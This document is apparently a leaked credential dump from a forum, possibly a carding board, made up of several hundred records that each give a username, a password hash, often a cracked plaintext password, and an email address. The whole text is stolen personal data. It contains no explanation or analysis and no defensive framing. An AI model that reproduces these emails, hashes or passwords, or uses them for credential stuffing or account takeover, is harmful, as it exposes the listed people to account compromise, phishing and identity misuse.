+swoop41:af34c704cea50103c67681fd58c84adc::mikecosta387@gmail.com +root:b9cbf8f57711e8bf19da004bc70bdcae::lilpimp06@hotmail.de +Schpeidaman:4bccd36ed6868df250dea93516608a6eba53b5d5::Schpeidaman@t-online.de +daniel45899:9d4cbe0007cd0bce925eb0c4dcb27986::gefahrer@gmx.de +jandf:a928041d688f2832bb1c4f0187cbfe8d::falk_dierkes@web.de +127.0.0.1:9662625bd49edaebda802fc23a1aa2d5::jakonaldo1@mail.3dl.am +123456789:9c80996aa12cfb5872ffe3abc00943d0a4e6da50::jungeohnelunge@gmail.com +Daveyo:814b9e766263f4409483589bae96a3ee::Daveyo@web.de +fibbo:af3b66279818cf70ec1abdd08cc0ff7effde4a0a:23882388:arnica75@inbox.ru +HeyHo:25e7031abcf8ed6145231291d6ec9797::lol@gmail.com +Clown:50644c5147162464a2e988e6faa4a452::aykut.34@hotmail.de +jackbauer:e24fd542863fdbad12da644705c25419::kranzpower@web.de +rolzer:9b1ab9ba1b5b8fdbc35a0a1bcdcd58c0::rolzer22@web.de +ACP@Gun2k:b009ac4504285cb9ab6c70ddb62110b4::sobel@safe-mail.net +RapiX:f242553c0abca58222fccd2d58174851ca6b2058::rapidzm@web.de +fugge:83389b171c0906540bef391cea56135d::fugge@spinnes-netz.de +Stinger:a01a4f28da5729bbea4964d2d9732d4bf8d19ec1::isnotbad@bla.de +HollyHood:cb42d92adfe505cdf8233e440181f026::webmailer@web.de +R1ddl3r:51e813e8c5691dccdffc57f8e7cd284731f90896::webmaster@r1ddl3r.de +rAelY:d6e943c96da7e0480e7baab7b7c9225a::rAelY@hotmail.de +Funkerman:14fffc9cff200702d5ed434e40d75ca0::dbert23@yahoo.de +derandere:95a14afa87d8e302616e2f214cccf0072ace1188:123789456:hsalskcalb@trashmail.com +eSC_phr34k:c5078812938bbc81e7adfb0636976fbb::thegamegod@web.de +#1:f6d548edaa326ca53b6d43c63393d168::gazi_08@hotmail.com +M0sTk1LLaH:dd41d6d15ffdbd5d1f54477828b7bad41d180672:8354649AA:kiing@hotmail.de +PxeL.exe:f10756581ca5887aaf21b46dfe69cc3458fde446::PXeL.exe@gmx.net +warg123:2e13b1705ae5954ed46ac978a248916b::Iaa_1@web.de +ehO:08ace16e2841903a8ce8183565752b715984e07c:crossover7:eddienho@hotmail.de +K-company-K:b620f74772c42b74d202cb488b4648b7::BG_2009@live.de +Fatalo:d1929793409c5a45364192fc76e1f802::fatalo@hotmail.de +wnbe:4709d8aa0d6ac41b63946831c17b547badf3e39f:wacken123:wow4free@web.de +colocolo1:59d44f7b01e356fd73a6595761b7271446d274fb::rach1973tom@yahoo.com +Ramo:b08030ceaa6d4017f6d25e8fb58835b0a5d69d6b:yokogeri:name_pw_inc@hotmail.com +marlboro:8bc30ef623950591a68672d128e3f9d71421d563:meinpw12:lol_marlboro@yahoo.de +Wounder:9491f083a510a56bdebc2fc07394281a7b354f07::hansnaum@yahoo.de +skun:a8ce5f8e1c9eff83a9a15530397bbe72::juwel79@rambler.ru +heugabel:8f3428f8c71739c7cedb55a909e3c8df4fe6eedd:247588:heugabel@gmx.net +snoopy:af8e8d8e8b5cef44d82b9a3dd1dc6135::dyingagel90@googlemail.com +Persan66:10152e98ab2a3ba127b5682d0430e3d1::mora5019@yahoo.com +makemoney:2d3d64f9e8d44a35e65674b7ce00f789::lavidaloca34@web.de +Shade:7b61114ccfc23a604c91bbcaba569c2a52c42147:obstsalat1:sdjsyvwj@trashmail.net +Punk112:356134fd78bd6c0188be5d03a82b5ebb::Jan@Pfister-Heusweiler.de +Forbidden:98448fe21a77db1ea179be7440c27e7e::decemb3r@hotmail.de +FastFinger:7a0af081dfd616e9cecca929852aeabc::lolbrot@web.de +iceman305:0a894cf1b465ed32b3539b61a96143ae935debe6:dead3393:a.lau@live.de +wolfi86:8d75a1d44fbc79bf263fcf53c38ac259::wolfi_86@web.de +swat4:4393aed7f914fc32208c48c2b77167e1::wow-swat@gmx.de +blzz:848004e4ddca30ec0e7b9d5d7395b5bf::spam-kai@gmx.de +P!nk:e4443af713fd10273c16d5168ac116a1::info@wow-store.eu +dnsHF:f143e2fdb563be4793800ce7036f5d61f735a4a6::jloas@gmx.de +logg23:304b1aa48845cbcce7c93202837a6f6b::psylox@web.de +bebbo:3df6e33c4a2e535557bfa3b0934c6c00::waggala_popp@yahoo.de +Dgaz:022d1a7e4551d07195cf0bd25d59d0b7d236af42:yozgat:antrok@hotmail.de +b0bm0bile:4d782d00685df25d6a310d81de8da49f::niklasz2004@aol.com +zidan369:9022bdedf1fcc3ffd0659db8088cafd53f194ef1:mathu123:zidan369@hotmail.de +rasko_W:b6caa2ca32b1b9bbc605c0ee766c9be1eb34c535:counter123:rasko_w@mail.ru +farid bang:476332a87cc6d654107ef303e25d2d29::farid@spam.la +Pretador:2942b813965fe98644af3be4dbfd7fc4::p14919@web.de +Defensor:e1aab68c82a237727d1ca3f3cc33d4c2::tanaka666@gmx.de +osterhase89:9e3fb5ddec78097bfccacdd95ba9e327::osterhase89@yahoo.de +pe%ep:4d8338381b515c22fcb33ff426868783ef217638:lalaland1:karl-otto3@web.de +spy:abad0d86ab7e273b541b1b3205bf31f0::spy_mail@gmx.de +tarnung91:96c80450fd88f7c1ee08722fb798de5264a0f11b::tarnung91@web.de +lollipop:51e48750dc57dbe9967b413fa6a97928::kugelblitz1337@yahoo.de +QFiRE:21cfc4b1ef1b2635dfbc26dab0ea66332dfe0304::qfire@hush.ai +spitfire:ebf516c581ad555c367245bcd1730088db92fd0a::spitfire-crew123@web.de +GossipBoii:3ad62b08d4af386a358c9462745f0a8e4a4012c5:9876543210:Carders.Gossipboii@yahoo.de +N!sK:7bb9753e5133c10ee5cbdb5ab6fd1c17d23b6ede:cocacola:nisk@hotmail.de +GodssoN:ef860443e03ead7dec8094fe674eb925::skaeteboarder@aol.com +crusader7:dc5bd704f3c0df2692e258cdf81506012cffea6c:leonidas:triton92@arcor.de +nighTbeaTz:5ddcd02ed11cf7284fc469f071927e0d::iwantelectro@hotmail.de +NextDoor:811bda9ef4fc0538e4d2d94a35f624c174920ea4::Crazy13@gmx.de +xEAM:132ae662ff8a6ec2b7c00174e204931668d7b7d0:naberlan:ahmetcan-1234@hotmail.com +J4b4:2d1b6022eca959079aa823ddb93dd276::0002020157w@arcor.de +jotreu:4d18898e3e68bf8140298d41dfe272cc::jan.reufels@gmx.de +E90:3077f619a17ce9720b8d3944107c22995ab42150::Maik.Mauer@web.de +Authentisch:ab83d7fa4a1ede372dc2ce929f58ec7907fae897::orhan_ffm28@hotmail.de +tomee:b089dc9836ae635be6f7edd3df3863b315955893:szertorna:g4m0r@web.de +Darkrain:312cbd4cc1f749926d19f2d48fb7ceb36d5e595b::213300@trash-mail.com +padii:31c74f99760bac8208b30dbd03ece0ca::info@padii.de +dmex:5ff353324e97bcfc9cbe27e0bd22a726::spinylobster@gmx.de +PEZ3r0:8052fc964452762e5754fbccd8e58b5e91ffbb17::tilman420@hotmail.de +madnielson:9dbe0199466cd7a426257f68974fd23d::martinbreit1@gmx.de +Bassl0v3r:197c951f275ce754f94bc9cb3756b632::patrick170@gmx.net +Raupe:81612191e9fce035870f51895941e77b2cc71952:12345678:apriliafreak89@web.de +darK666:cb8cb0e2870dd22b4346fb1de7c160dd::e@e.de +obeneba:5b105c3d694ee822bcadc786ea1cdd89::obeneba@gmail.com +ppkiller:969682970f1b0100f21717042598bf19::ppkiller1@gmail.com +vadM-:87be3e84eb4b676be1b531b7f5c2950a::xDDDD91@web.de +thcjay:f34b2028dfe4b15bc2b09fb26b1efbad::thcjay@hotmail.com +Suppenhorst:e72c30cec77fdddb4f1895b24743aa3e1656fba8::schorschn8@web.de +KarlKokser:918f8ebacb746c673160445f43517ebe::Alex_Fr@hotmail.de +scriptX:ee7f18c31f9cb2c0205820ea0b5464db6a54f4ad::huh@hushmail.com +Brot:ae2453250b000987f63e623ffb6e85a4c0517960:videta36:alben@hush.ai +Skinner85:b3fdfc77aff35cace699384ef5f651fa::F.welzbacher@web.de +mariomalle:bccfdbbd20a620064c8671b5ad8a000e::mariomalle@hush.com +rLy?!:33a6f6a4edf50cc9a3f8d95faadf7f85::dieterpausch1@web.de +Brank:63e30fdbd0a4e770ec6d404ade3aa2a8::llisten@list.ru +Jolle:83e6243d118764d16cdb0a1836665b8c5c8013c2:minka123:saschanitz@t-online.de +JonBour:18f6262d84e39bccb526fcbbec43983d::jon-bour21@freenet.de +McTrash:b233e087fa7e89ad23198c5d76b2e0da::cun_privat@hotmail.de +Swich:579b185fa9d9db14c33a8059bc798fa7f5696b7c::blablaxxx@web.de +bukake:5cd6562be33869496535738825aa8ea6::namkhuat@web.de +Dexter:cdc2dd8368ff41cb1c548eede6fde64f8f393102:lolmaster:lol@007.de +casino:9b15fd9c5ea19c1714edf011d8c27495::tom.eberhart@pochta.ru +moneymakers:d49c65c410988c0732b3ef40d44198f6::nicopickel@gmx.net +xtasy:bede665698c1eb5096ae921c03f5367e::xtasy11@web.de +13warlock37:dbe10938e54cc6428f66444bcdde5310::Creez2@hotmail.de +P4r4N0iD:6ce1be065b2709f076503b045d9777ccff610772:31333133:maximilian.hofmann76@yahoo.de +1067Riddick:d25b573103f2690068e2c429f54d1b00::1067Riddick@spambog.de +Al-Carder:ffc0a425e0a69922d96d89815cabeba0::coderhh@hotmail.com +Logont:eb400feffdee5fcc4eee85ff1c187ea7::Logont@gmx.net +wolax:e8f4d0bfff36d391bff4656cb38d10c28585125d::fazeskaliert@gmx.de +SuperBigbenRus:8c67fd37f2f3fca2cc17a9f47cd37588::super.bigben@yandex.ru +klauskleber:0e3d2b1ac4405a040d4f6b97ae9a9d0e63591b98:123456zu:ikeeike@yahoo.de +Skulfuk:e2d4151baa893e252e9e8a2b95512ffce8adcb84:45gz78:eurustus@gmail.com +haege:07d3da131676893ada77656d563bfe1276f028a3::bubibu@yahoo.de +domme2914:694d4b4923a4be6ae276abc0f42d268ac4bc1a64:12231223:domme2914@gmx.de +Mariah:a16d39f9185b2c655e9725477129b67c::aivd123@gmail.com +Sakasto:2ee6d9df7dbc2602cd41f0581abcb060::dark_id@gmx.net +cracker009:9358133651771f7e30dce39f2663c219::a2398729@uggsrock.com +Schnupe:edaeffef7fce066245938ede33d2aab8::lohgamer@web.de +mzxtnos:4d8447147a1c2cd2985048c04255f347::Scream-killer-6192@hotmail.de +Nightmoon123:19392fe6a7a8c023a5d4c08a6044dfcd::andreasdermeister@web.de +darkking18:cbdb126c35aab4bf054248f5b140b4bdc94f074d::deniz-kevin-fluegge@web.de +psycho:c738b3d7839fcb8cdcb2e3833f545853::Bilal47@live.de +MorLadim:0f27c52402f0abf0dbea35fcbe59163e::scharnhorst@bk.ru +Geld:26c14a2e037b866f8c6ceee9f20fd63aa6fae772::casherbeer@gmx.de +Kevaldo:6f63913a2e29f164bf07e3a6220d1db3562f8b24::rickrolldme@live.de +Spec1al:85fd950da39c54697fec54185a8919efb0eee416::webby2@web.de +nkapur:b0813b1f22270002d4307303db1ee68a98cc49c9::LindaJarboe@nfmail.net +UnkownUser:bf033bb42b10fbf968129123af65afa1::thomas@kuh.mu +zuz:57a6cc537e6144f544cf9f70cf2e44c6a76e74db:123456:peter@web.de +Fray:5f23846d7af25ea508dcf5142e3c36e3a7de0ac3::fray@mail.3dl.am +LuckyStrike:368aae4e4e13c61f55e075b38fa71ae9dfdf656b::jimbob-pro@gmx.net +Bubblexx:3d88ba24e9451700144e6dd81eaa9d03::bubblexx@web.de +Kirox:4de0280c068d4135353611ea343d1343b6b580a9:9157aaxx:FlorianKluge@gmail.com +Der1Pate:050e49aa9ce29cc30ec50573af25082b7ae65e07::montanacompany@msn.com +afakename:cce13e15bf450220d0bae6952a27fd1c3a526a6a::johndoriandorian@yahoo.com +jungleboy66:4768b0dbe66fac3dbc39556ec162a1d0fd756baf:41554155:flyff.web1@web.de +reflex:be3ffe2a9ddf9e92f37971fea0ec0ab5f773f57f::reflex@freak.la +lucker445:2f4973c068a3076b9282d13c857c5f50::gamezaccount@web.de +k0ck3r:183bc2757ebcfb64a5889a1abe3de335dd2e3aa3:TO19045OS:fl3xx1337@web.de +JamyJ.:b8310fcc5e30ffacd69bfc34397f7982::leet@german.com +baby:31c724513cd2d7aa1f800ecd6a192954::babyrusher@gmail.com +lolomatiko:e519b9cef6e13f4eeba58cc956b66da00725aa9a::lolomatiko@safe-mail.net +psycho_ak:791bacc06fe238657cd38dd3147b37054f0974da:nokia1234:gangsta_tousif@hotmail.de +Royal Flush:36dcfd576d2f653ccaf984ce370268bf::fickernummereins@yahoo.de +n0ize:6bffef34ef159ae4c742e7e1de054f5b::n0ize@spambog.com +G-Herm:7e23a08eb1f76b7e8a9f0c5e46cde84109b2b682:01724776692:xghermx@aol.de +stanzzky:0c028819c1d70401a6c22576cc6802a3c023193a:penner11:simon.snitsky@arcor.de +askay:963a1095982a128c1039a5c2682f2552::coolingx@web.de +BERSONE:e622ea47b37842469166943f2671cb72::dubstep@arcor.de +SoL1sT:770fb9bec40f282290b8a1859b00bb6ea496f717::t4zh@kuh.mu +Milkman:2c66021057ba22916e64f95e5325fd15ba59f9f2::amunra@safe-mail.net +furkan2009:8582c3b23cd890bebed17e8ae4bf4889::furkan.oezer@hotmail.com +Kasper:eb23b3d5a48b3f0264fc14c8d40c6614::kasper@aol.com +sp!n:89c4bba313121ef4d6a3bfa038606b27::spindesign@mail.ru +Mass:f5742b39e0111e62a9501d0ceefbd487474db78f::linkinparker@ist-einmalig.de +DragN:ae404924c06d908c6e833650d709f1f55fa74081::dragonsugger@yahoo.de +foreme555:a19aab125390fcc25638e2cd54ea6276::hamada1609@gmail.com +UnderTaker654:417fbcac92d233b106a544a9c8d764b6e9a7dabe:teddy:s.tyler.92@hotmail.de +necro:e1585b2710b6ae2e9fe70c360e42c7697166b88d:xsicht:paypaluser12@web.de +failed:b5202ddce94a25232c6eb822dfcaac9d::failed@sogetthis.com +Breaker113:ffba31369ce89d3ad187aaef319e4d2e::k4e-clan@web.de +sybaweb:0f2f2a6371305025b55868ec770ee7cfb31a2402::p3tr@nm.ru +paTTaX:fdea8f86cbe333e6c961da453b3aab0bdeab6317::thepataxx@gmail.com +clone:099f8ba475e1e02287802ea58324c664::clone@yahoo.com +Franco41:5f03414ed28c3561e9eba7768442dc3b::lasse@mylin.de +ShadowProphecy:4c9b59421714ee8313a1bf2522de5762::ShadowProphecy@warez.tc +CyberGhost:12aad0c68705d6f238e6f79447d313c2::packstation.dhl@googlemail.com +sharemaker:74a67af348e304a0cd4e0710e33d037523b96bff:qwerty123:burberry__1984@hotmail.com +Dioslipper:19b22ca41151ca6af7d6e8097fddca89::Dioslipper@live.de +Zuruck:a9ea9dfd48e921c8d0c8c180e3f7b026::humanspam@gmx.de +Doom Mortal:8c5d31666e9164c241e9f50eafa5eba0dd9d378a:Nightmare1:DoomMortal-CU.AL-2006@web.de +Tingel:06fd299e894f40a69511d46ce120e6ed8000dff7:blabla123:piano.fabian@web.de +M4verick:3050d89dbacb08dbe9be09cd79ee531965c8dc62::M4verick@mail.3dl.am +mrpi:4bf96208670337c504917b71a5733ea6::piopibou@mbx.cc +bennu:2c8a4f0d79e836a10c0f3b6e8e6cf36e9cfbe1c9::deinemudder25@web.de +_ring:8f6c38f8610c40ec6385577d55e66520333d784d:hurensohn321:a2450614@uggsrock.com +YAMAMOTO:c95281bcda77938414b89293efe006ea0f6aabcb:hans1234:yamamoto70@web.de +WaveMan:79d418c1017f4fb47a24bb9c474557eb::2432332@spambog.com +cangria:87ac5d2ba25e5863e83c6c1b1c9813cf7605a412:single21:cangria@web.de +exitus85:4af7d095e80dfccaf3b4f6ef38645db8::webadressebeiweb@web.de +3batl:d256aec7e0b1ea8cbb2ebc9e9df2ecd58fd2ec2e:asdfgh:3batl@mail.3dl.am +Papaya:0b3bd064782a47e078413540ab8ae8ff::24323321@spambog.com +Mr. Jonson:340e2d740e61279484e55edfb288f9bb::jangodiemango2@web.de +n0ise:8abf1ca1fa577fac2fc3859884e4ebcf::n0ise_1337@web.de +Dr.Gr33nthumb:572b7115a51ad1f12bcded5c519b5412638a8419::cool-t@gmx.de +qbishon:1d1eae52b0dd248fb00720d843e065be::poma999@gmail.com +Bandito:db6af65796374230c5ebcaf3ed361d0082f779a8:marvin:ultra009@aol.com +shrimps2711:c917141be645cd198a6113ea29b4cc4d59f3a72c:159753:SilenoZz@hotmail.de +and1:26524dd108d3ab2aa1260d4bf7efa5b5bd38045b:destroy:Dr.Evil2003@gmx.de +Maxymus:e970f6ecba11e484f86b794a270702164578a3c6:lolo333:maxymus@hotmail.de +Cb4:0664a0d0235d42ab30e84968a65a6607::mille2@gmx.net +keksi:3c627f9ad217e1785e679cfa7c75bbe5::33422342434@spambog.com +-$p!c3-:38774f0a3dce15dab3f9a043d5f7350077a2a0a3::cinc@z1p.biz +bLa2o1o:c167df443fab5d834e26011610a5d408a91d372e::knut2912@web.de +SunDay:6fd5f87f6d94df36b6f8e48672697138fb726860::marvin.horne@googlemail.com +H3alth:9c0d7e77508c2fa2e50113337e80bdac47ee2141:deinemama1:h3alth@live.de +s3phir0th:d15e2d79eb7411ca80a4bffad5b1902263a9a4e0::s3phir0th@hotmail.de +cafissimo:34d6bb9061d2176ea4d6abd3945ab39e3f7b6bbd:730518:ashtaster@gmail.com +Packman:8781df0e4f14e214c8b1050d96fd3ae20c683af3::xerror@smtp.ru +131337:b47029f2568b1376ea3cf7942a04f55752cf0d75:hurensohn123:jddesignsteam@hotmail.de +Zerocool:845392bee2405da199d3ff5d615c9d19::r.schmitt71@web.de +derpeter15:4001b8201842e29e2504bf20534c97f7::derpeter15@web.de +Vladmir:1e9f3d1981a2854bb2ddb3250350296f::carders@gmx.de +alpha:95ff8ebc43c1aa4009c105aaf1d5f454::sami_bahloul@hotmail.com +skysurfer:009461f9cc5deae9228340faf4a39e72ecdd27b0:rainer12:GVU@mail.3dl.am +KatzenFicker:f448623cb401d12ef904d6f6b613911279e7bf0b:test123:a2506156@uggsrock.com +NightAngel:4be288e0a3e1fff2b6bcb7a2db69aa5d2b06588c::ThKo4@gmx.de +Bitlocker3:5ebb1545d1d427bd72b9e5a929d37a68::bitlocker3@live.de +w0rmz:afcff55b2fa567c28458e912b130360498b745f2::w0rmz@mail.ru +xam4:ae92a43a2de48ea1332ebfe6b9315555304a2105::daniel.staufenberg@mail.ru +AX3C:25b9d8c42535b2fd8ecd171b6fb38737::c0xa@live.de +david_osiris:9c38774a29ea43fe632faad1d0891ab1f3121e02::zero505@gmx.at +BeroBass:1bc922c2e9e0d2f4e45ce7000698b942::stefan-lange77@web.de +shunkweed:e30f33489019c304bc93571d243cad9a7a3f8b89::shunkweed@oleco.net +mclovin:5d83fc6ec65b280f84ae071aecc342f4::mtx-ryder@gmx.de +Bankdrop:b301a47e04d914397ab5281b5437a308::daniel-kaslik@web.de +7h3m37h0d:cfab3f179475e3dcf83c0e01224f2988::stiel4@web.de +misteranon:dd1d96ca87e3e6b167705e5eb82bdfb4f2ec0cfa:foerster:anonuser@mail.3dl.am +SpeedyGamer:f4a6751d6e8a2513e3b2957fd1ecfeba2ab05575:Norman:speedygamer@web.de +theAna1ySt:69854926c4d6eb538bf0c8d5cccf566d376f6a0e:qwe123qwe:masterg@europe.com +Grand13:ed94c7256143ec6fb21731a08a7d2a8e::haleidoski412@web.de +trace:d7c8de78ea791d0f3e72beba3b86db2b8fcad948:newyear:jumperz10@web.de +13download37:30dc5bb0389167ee92ebac914722f17d::13download37@safe-mail.net +the crow:8a616e73fa6d37349cd9f04f7ae8af72::steffen_spieker@gmx.de +pujaa:bec58fc1f1d2378b8aa993773d088fa7::stefan_maric4@hotmail.com +CashoutKing:49fb8cebec17940abf9ea8dd0e24998d::delepid@gmail.com +cardfather:010bc121c7f403a5fc9042a00dacb65e::cardfatha@gmail.com +xXDarkiXx:2ad6e1fbfbecb25dc47035eb610a5d9f::kanje@live.de +Kaho:b1fc064106178e1cab35debc371bdb37154fa91a:12231223:sasbrz@web.de +FallenAngel:4bae7455cec914ac0504c3a0bf986494::dergefalleneengel@web.de +timbobimbo:d13f0c639010b11a94f7fd08c7853d77675736f6:deluxe13:hubuluktu@yahoo.de +tbb:109024b8b7d36fca7fd9bb9e4dbb7946::tbb@hush.ai +Dr.Faust:52ccfb4db4d5178730c1ebe3c033d3cb::MarioNaumann1976@web.de +Celta:92dbfd05c95cd23ffb16dd06148c7ef1::h4x0r@kuh.mu +nCore:764efaeec7b6dc32a2afbfe4029c31b1::cheat3@mail.3dl.am +manofhonour:78a9410bc1ee69477fa3d22d6b0e7031::deusex-3@web.de +Cam0cka:b888237b13c3bead3e39c352023544ecfb9d5b28::Cam0cka@web.de +M4ny:27dd0555ecd686d878aebfd9f13167dc::david.reinhold90@gmx.de +lolmaker911:5c99b09c21415db4c68ac19c46c4c0a841dbe8a5:123456789:lolmaker911@yahoo.de +Sox:48b879673adf19acad591d95b7136508::Arthur-Gehl@web.de +explorator:ce3ca3f9fc10c1cf030c0e52911296b2::explorator@hush.com +Sinus:93c2f5b39b699dc1165346088b635fd5::maka37@web.de +det0x:3e43dc91981c8a3a6ef55ab73811e636abaf34cc::psferox@gmx.de +bimbukky:a28285c814292b4dfb0386379f3a0c06:: +KezZza:fd78812719bd01ade0e8c6e1c736e1d2fdf893e9::kezzza1337@gmail.com +ap0calypse:9e26cf2ebe5123bf07512b0a9fbe23a6::ap0calypse.101@hotmail.com +Mr. Nice Guy:abf9216521620609fb1e8d69d4a97d4c::rabun92@hotmail.de +Chronik:5b43561b88309dd4ec8a7d18e529c8c3::buba86@msn.com +pi.:aa97a63d69b45b2beaab65935339a27d1cc3d085::weadsjk@afes.com +Diablo:eb4f76cf70faeef751b589bcebe092bd::cintax@arcor.de +b00m:4bc9e9f862887fe6f6566d0055e7931b::b00m@kuh.mu +Envy:e0f1194c67234b45ac4c0bf27ca34765::envy@gmx.net +Blakharaz:5696e4f54daf87707f16f158ada12dd387d44563::endsieglopaedie@gmail.com +Illidan:3c974c8acbab3d7fa60518e237a0cbfe::IllidanSpirit@web.de +k0kaink0wboy:e98aed13fcdcd43f9f70d4e1a195ba2d::k0ksi@o2.pl +brocki:27cfe5aa6949de6db177c84d243da8d18b8e72b4:anja1988:039481@googlemail.com +KRAT0S:36b8d897b3426513ebbc11a5588ed8d6812d6bb7::abaddon@hush.ai +localroot:41c1f4a385d5b98810aba0ee95b50683::vserver@live.de +TheRazorah:79c495bbc4cdb283c4294ffbf99ad8648b5bc893:r2d2star:therazorah@live.de +basicimplant:2048c084e3a4bd31147e8f3bcc1ad6e9::basicimplant@freenet.de +skydiver189:22498303f5319cef11ad2aafddcf3f77::skydiver189@gmx.net +daten555:7e3f8afcea176b77f31cb29811d6d7faddc9335d::s.kleeb2@bluewin.ch +R3vo:9fcc6378e1dc10ddb8a612357b5485bb3254eab8::paypalcom.we9@gishpuppy.com +masterblade01:b66e5c1008949e0d830724eed59cd5b82b6ed5e3:morpheus:masterblade01@hotmail.de +Ground_off:9b7d6f8905b3a350b335ad583707dcbc5a180c9f:q1w2e3r4:groundy@email.ru +Explos!V:edf10a9431cceea3ba378f42ad07b853::cs.s@hotmail.de +Sony92:db7fb6c045c30652a5ce54ac9156d096971c6107::a454745417@web.de +sa3er:5c76ce58630b05449de1e35557057a36::latikapan@hotmail.com +Tikon:cc0a5a12cd13b878e21d0b7a4eca69a73110203d:minoch1:mrmarouan@arcor.de +Mrcartoon:f274968bcbe3a935ebba93cd528fd0dd::ddd@web.de +hss404:f09368df5d118ed194062eccec827a2d::zackk@web.de +hacker:0dd557ef2b779e2e4d20d1d3141ec4d5::55521@wegwerfemail.de +TA4G:91a458fb8b9fddd95e77b5248adaf7dde213b06a:tagtagtag:TA4GGG@yahoo.com +lt;Jigsawgt;:2c311f2977fe454116de6232abb566ba::aggroberliner222@web.de +N3Cr0N:d479d3899e9161ad1297d8c5fb37861c94fd8948::N3Cr0N@hush.ai +deathkill187:3f2ca6f6d1c73fa267de38ca98bd1000::hirnspaltone@web.de +blijed:48a699f89b076fe458d3c04541860db9::blijed@mailinator.com +g0ldphish:acc59b28ffd7566846197e1d7af540a9::adolfosaurus@yahoo.com +aliadso:04d4e251b596718abb0a2a2947e7baaa9f2da8e2:haften15:xaero666@googlemail.com +Nightsaber:32c4a4c2c6dce6780107df2dc23d55eec0f1bf5d::19nightsaber90@googlemail.com +happyfree:bd452c4d0b670940c453303b6382fe7859f9cd97:934622965:Rambo110@gmx.de +Luckyboy:c5bcd142291c451cd6c7b67c825f16fc::Luckyboy638@googlemail.com +TrickTrick:3ba2fa3b002a64671ca9d52b247e8057::trickyyy@hush.com +K-Lex:657632753c8c88d13b5a4177851fc03a::hurensohn14@yahoo.de +Jigga666:21c2b6207c6dbb79d59301446691c76946fd2547:159951:Alexander19609@googlemail.com +kingling:d83d2af282d9078d02a72c9193dd870662628e12:eogksalsrnr1:kinglingbiatchh@hotmail.de +polinger:717ee2ff1910c5ec292c50edb33bd81be43960c6:123456789:polinger@bk.ru +CrashQE:9df87f21dfe4ecdf39e939b265cc282c::CrashQE@web.de +Sp3ct0r:6df91c6b327221f401f6a9b3423c9098::polo2005@gmx.de +Benzema31:accb413e58f68eb21a67574733212597::levent17tr@mynet.com +Kraitrazer:23490b42968983d2ad305275a9efb7bc::kraitrazer@mail.3dl.am +serkanhh:28f0bbcb607edd518b9e03d4d90d0525::ticket2@live.de +Unbekannt.exe:08c2a40fae68df90e81e4d4833a75ec9::unbekannt.exe@web.de +LosMighty:308fdf88d3a30da79a5a43ada2954c3731f99ec0:renate76:stormofdeath@live.de +kk3kk:781ee52e186c5c76b87176037f1c86c963503e4d::kk3kk@Safe-mail.net +ForrestGriffin:49bf4bd13450c899f4fb6e935b7ba1d12e909b02:knigge:cultofcartman@safe-mail.net +Licos:2430ad638e395325bcd8c25847baa51c::l1c05@mail.ru +Sonny Black:707b987cf6aa5b6ec8a9a0eb48ed92da::sonny-black@wp.pl +methefoo:214b91496034c81a620a08276801b6e6c378e280::methefoo@mail.ru +lostrudel:be31306181aaa949220c3a0e05d26652::lostrudel@gmail.com +Kakashiii:1bd228fb86f79e97413e5c0c73258f1b::Isikunt94@web.de +pau:7108a1b346536c0851ebbce37ce23300550b01a4:qwe123qwe:ppcacc@web.de +d3dlx:7dde04aaece2b68b8896c6ba22f370c2::Guenter@mail.3dl.am +stricher:c3db67203959b968dffc8968927106a4fd282567:cocacola2:deokk@web.de +cRacKeR:f4bcde5de67ea48085c1a9d01702fd71::christiannordhoff@web.de +hoppski:b2cc03159418e509b0cab46bdb08f38d45b3ce3d:ronja:speedmoviebhv@yahoo.de +tron:c9ed9186f16e689fb29c6d8f3ed2f892d740ed9a:4x49l844:istefan@gmx.at +Snatch:f89220d723ea2c9502011f67ec0345b288d96fd3:012012:dll_sys_base@live.de +Shuffle:5cc85207a6769a28e4b971a4bd462cd40e118c3f::savz17@web.de +Denzo:f8fabaf31835af5b4369152ccc0cefe13ded1f7e:12121212:deniques@googlemail.com +gfx:b4558e2095df874d24f3551636c655ce::synthon@who.net +RaZ0r2k7:977872a300940e7ba262a9cee633020252fbf109:19930720:artur_knaus@web.de +sh0kfir3:793718aa4eeaf1ae86bd9d95fe4bff474555ebad:malaguti88:sh0kfir388@mail.com +f0rk:5aa084f5d303294f27257c78765a128e::cool-e@web.de +Niggas4Life:5e9faa3da0412909d9950765b9fa3ed9caaaa49b::niggas4life@hotmail.de +BiG-H-27:81efa7a4091fac5061d0f96461479950::lil.milli.boy@live.de +cata:4936742f7fe657cfb8715b89895cf3ca::cata5292@web.de +thc:cc896ec372dd17c051fe0dcd954cf75f::cool-e12@web.de +d3stroy:2b8df36ab94ae0a1a787bc3e2f5de1e5::cc_d3stroy@mail.3dl.am +Scorpion124:57a85511152b241399463d34f365322da310f7c6:fr34k0r:anon4me@web.de +Nesia:2805b4a46282c2a2720e89bf7b493af3::nesia1@web.de +marshall22:771ad321aef92a855c9d4935bb9befd2::aassdd1987@yahoo.com +0010110101001:4e0726d4d325ece2f67e536138b2dae48d380801::ichbindannweg@web.de +King_Styler:1ab1ee890b930302ecf8eafa676b72ca::Wermanser@gmx.de +anonymozzz:f5993892807288032cbe2183a739287e7a089938:money111:lesauceur@yahoo.fr +hunker_joe:ffb7d6509d88daf0762cfb821d7d9526ce1dd0f3:iceice11:hunker_joe@web.de +Stengel94:8180392893d8534417c394a850418514534ac3a0:badboy123:lol@web.de +shineOfheaven:40db7dafa0f8cf66e85144b13450eafd::shineofheaven@live.de +DoT.HacK:f555058e6d1378138304cfe5d599cb29::Dot.hack@live.de +TheLazyMan:71f48d292eaefcb98bbe03a97392ffd30bfdc13f:johnny:Manuelbuff@gmail.com +Kali312:eef42487adce8f968c1348af0c6795ed::Benlasder22@gmx.de +ifeel:80fa646c28026559663644d6efd44ed4::ifeelx3@live.de +darkjoker:b866cfe4d6374830fa07b4536207e420::DarkThorben@web.de +Tower:3d23fad4b03999359b02a5ca3dea5c6552fd5e43::eisenoxyd@web.de +emoElmo:8da81d3ab7a609c3f433022fb6ffd034::swrz@inbox.lv +Serokon:59e745980a739a8195dfe8c2a4bf8b03::Myfaketool@web.de +Mr_!CE:5037aa8b5ac8901150ceac6c3659ad6c22939e7c::mrelite@mail.ru +SniipeZz:19bc3af6bd494e44b2ba71b145f025288b949358:sido11:BlackSniper-Alex@live.de +Franz Hose:43c8da372c09adc5382de2a206de3f1a::ms841972@web.de +bigbensnake:4f0af78bb3463fdeae96df4365a3f35d::bigbensnake@web.de +0wn4D:2c9b53a3c14d93a23ea61f2ab2848745::smarty_70@hotmail.de +ccdumps:5bca885afa7f4e99e1857f661b887ce4::tsims@live.com 